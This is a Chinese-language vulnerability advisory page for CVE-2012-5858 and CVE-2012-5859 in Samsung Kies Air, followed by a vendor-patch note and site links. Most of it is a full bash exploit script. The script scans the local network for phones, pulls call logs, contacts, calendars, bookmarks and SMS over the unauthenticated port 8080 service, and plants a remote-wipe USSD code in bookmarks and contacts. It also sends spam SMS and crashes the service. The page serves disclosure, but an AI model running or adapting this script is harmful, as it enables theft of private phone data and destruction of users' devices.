发布日期:2012-11-15
更新日期:2012-11-17受影响系统:
Samsung Kies Air 2.1.210161
Samsung Kies Air 2.1.207051
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56560
CVE ID: CVE-2012-5858,CVE-2012-5859Kies air是一款行动应用程式,可通过Wi-Fi将电脑与手机连接,并可使用浏览器加以管理。Samsung Kies Air 2.1.207051、2.1.210161及其他版本存在安全漏洞,利用这些漏洞可允许攻击者绕过某些安全限制或造成拒绝服务。<*来源:Claudio J. Lacayo
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/bin/bashecho " ... "
echo " .."",."
echo " ,cl:."
echo " ,dOo""
echo " .."""""". .,,. .". "," "" .". ",. ,, .lXXd."
echo " .x0dllllllc kMWN. ;K: cMMM: ;Kk. c0d. :W0. .0Ml :NW0c"
echo " kK" cMxcWO ;K: "NK:WN. .k0; .xKc :WX" .KWo "WMM0."
echo " O0. .NX. dMc ;K: .XW, cWk lKl "Ok" :WN" .KN: .",;;,"......."lWMMX""
echo " O0. .KW; .KN" ;K: kMd xM: ;0O0d ,XX".KW, .KMMK:. ...."".. "
echo " O0. ,c xMXllccOMX. ;K: :MWdclldWN. .kKK; .XNNN; 0MMk "
echo " O0. dK. :MK:;;;;;kMk ;K: .NX:;;;;;oWK. "Ok,lKl "WMc dWMO."
echo " kK. dK. .XX. .0M: ;Kl kW; xMx l0d ;0k. NM; .cKWk,"
echo " :Kk,.."""xK. kM: .XX. .kKl""...... oMx .KW; .xKc .k0; NM; "lO0c."
echo " .;loooool; .xl ,x; ,cooooooo, .dd. .xl co" co. dx. .;oo:."
echo " ",... "
echo " ..."
echo " Samsung S3 Kies Air Scanner - v.1.3 www.samsung.com/us/kies/"
echo ""
echo ""
echo "
#################################################################################################################"
echo " Filename : kiesauth.sh"
echo " Date : 10/23/2012"
echo " Authors : @cron__"
echo " Presentation : http://www.slideshare.net/firmware/kies-air-launch-steal-crash"
echo " Whitepaper : http://dl.dropbox.com/u/7779799/SamsungKiesAirAuthorizationBypassandDoS.pdf"
echo " Version : 1.3"
echo " Description : Script to detect local running Kies Air web servers on Samsung Galaxy S3 phones."
echo "
#################################################################################################################"
echo ""
echo ""while true; do
printf "%s
" "1) Scan local network"
printf "%s
" "2) Send DoS"
printf "
%s " "Enter an option:"read option# Option 1
case $option in
[1]) ip=`ifconfig | awk /inet /`
echo $ip
echo "Type in your IP: "read ipstart
echo -e "Scanning in progress...
"
sudo nmap -sS -p 8080 ${ipstart}-254 -vv >> nmap_scan.txt
awk "/Nmap scan report for Android/ || /open/ || /Samsung/" nmap_scan.txt >> ka_online.txt
printf "%s
" "Active servers found: "
cat ka_online.txt
printf "%s " "Was a server found? type "y" or "n" and press [Enter]"read connect
if [ $connect = y ]
then
echo "Enter the target IP and press [Enter]"
read target_found
wget --ignore-length --quiet http://${target_found}:8080/www/index.gz.html
printf "
%s
" "1) Grab logs (incoming/outgoing calls)"
printf "%s
" "2) Grab address book"
printf "%s
" "3) Grab calendar events (experimental)"
printf "%s
" "4) Grab bookmarks"
printf "%s
" "5) Grab SMS (incoming/outgoing)"
printf "%s
" "6) Send remote wipe"
printf "
%s " "We have access, what would you like to do?"read action
case $action in
[1]) wget --ignore-length --quiet -O call_log.txt
http://${target_found}:8080/ws/telephony/log?startIndex=0&maxItems=500&sort=time-descending ;;
[2]) wget --ignore-length --quiet -O addressbook.txt
http://${target_found}:8080/ws/pim/contacts?startIndex=0&maxItems=100&sort=alpha-ascending ;;
[3]) wget --ignore-length --quiet -O calendar_events.txt
http://${target_found}:8080/ws/calendar/instances/1348977600/1352606400?searchQuery=calendarId:1calendarId:2&1351121143933
;;
[4]) wget --ignore-length --quiet -O bookmarks.txt
http://${target_found}:8080/ws/browser/bookmarks?startIndex=0&maxItems=100&sort=time-descending ;;
[5]) wget --ignore-length --quiet -O messages.txt
http://${target_found}:8080/ws/messaging/messages?startIndex=0&maxItems=10&sort=timestamp_descending ;;
[6]) printf "
%s
" "1) Add remote wipe as a bookmark"
printf "%s
" "2) Replace the default AT&T bookmark link with remote wipe"
printf "%s
" "3) Replace contact information with remote wipe and mark it as favorite"
printf "%s
" "4) Add remote wipe to address book and mark it as favorite"
printf "%s
" "5) Send spam SMS"
printf "
%s " "Choose an option:"read wipe_option
case $wipe_option in
[1]) wipe1=`wget --ignore-length --server-response --quiet --post-data
"url=http://192.168.1.132%2Fremotewipe.html&title=AT%26T%20Mobile%20Web"
http://${target_found}:8080/ws/browser/bookmarks` ;;
[2]) echo "DELETE method not supported by wget." ;;
[3]) wipe3=`curl -O curl_response.txt -X PUT -d
"title=&firstName=Vicky&lastName=&suffix=&nickName=&homePhoneNo=&workPhoneNo=&mobilePhoneNo=*2767*3855%23&defaultPhoneNo=-1&workEmail=&homeEmail=&otherEmail=&organisation=&jobTitle=&favourite=true&accountType=Phone&accountName=Phone"
http://${target_found}:8080/ws/pim/contacts/37` ;;
[4]) wipe4=`wget --ignore-length --quiet --post-data "title=&firstName=CALL FOR A SEXY
TIME&lastName=&suffix=&nickName=&homePhoneNo=&workPhoneNo=&mobilePhoneNo=*2767*3855%23&defaultPhoneNo=-1&workEmail=&homeEmail=&otherEmail=&organisation=&jobTitle=&favourite=true&accountType=Phone&accountName=Phone"
http://${target_found}:8080/ws/pim/contacts` echo -e "Entry added." ;;
[5]) wipe5=`wget --ignore-length --quiet --post-data
"folderId=&destination=tel:111&destinationContactId=&destinationName=&body=Hey click this link!
goatse.cx&mimeType=text/plain" http://${target_found}:8080/ws/messaging/sms/messages` ;;esac
esacelif [ $connect = n ]
then
printf "%s" "No available targets found."
else
printf "%s" "Not a valid entry. Aborted."
fi;;# Option 2: Manually specify this for now.
[2]) t1=`wget --quiet -p "http://192.168.1.136:8080/www/apps/KiesAir/jws/ssd.php?E&&"` echo -e "Crash successfully
sent to device.
" ;;
esac
echo -e "Script reloaded.
"
done建议:
--------------------------------------------------------------------------------
厂商补丁:Samsung
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://samsungapps.sina.cn/supportMain/getSupportMainList.asDrupal用户只读模块安全绕过漏洞Google Chrome V8写操作远程拒绝服务漏洞(CVE-2012-5128)相关资讯 安全绕过漏洞 Kies air
- StarVedia IP Camera IC502w+安全 (03/29/2013 14:09:17)
- JBoss Enterprise Application (01/29/2013 10:15:58)
- Rockwell Automation ControlLogix (01/19/2013 09:22:12)
| - Netgear SPH200D多个安全漏洞 (02/02/2013 07:26:29)
- Rockwell Automation ControlLogix (01/19/2013 09:26:45)
- Yealink SIP-T20P IP电话隐藏页面 (12/24/2012 19:15:37)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接
|
易网时代-编程资源站